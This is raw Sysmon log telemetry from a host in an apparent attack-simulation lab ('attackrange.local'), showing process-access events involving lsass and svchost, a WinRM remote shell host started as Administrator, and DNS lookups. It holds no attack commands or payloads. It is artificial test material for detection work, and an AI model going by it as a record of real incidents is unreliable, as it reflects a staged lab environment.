13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.356{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.356{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.356{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.044{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.044{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.044{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.012{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.012{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.012{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
22542200x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.840{59A5CD1D-8E15-6005-B802-00000000A201}4560f.f.f.f.f.b.1.0.b.2.3.2.0.e.8.9.0.0.0.0.0.0.0.0.1.0.0.0.0.0.f.7.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.824{59A5CD1D-8E15-6005-B802-00000000A201}45600.0.1.0.7.2.0.a.0.0.2.0.1.b.0.9.0.0.1.0.7.2.1.9.1.0.0.0.0.0.f.7.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.785{59A5CD1D-8E15-6005-B802-00000000A201}45602.0.0.10.in-addr.arpa.0type: 12 ip-10-0-0-2.eu-central-1.compute.internal;C:\Windows\sysmon64.exe 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.747{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.747{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|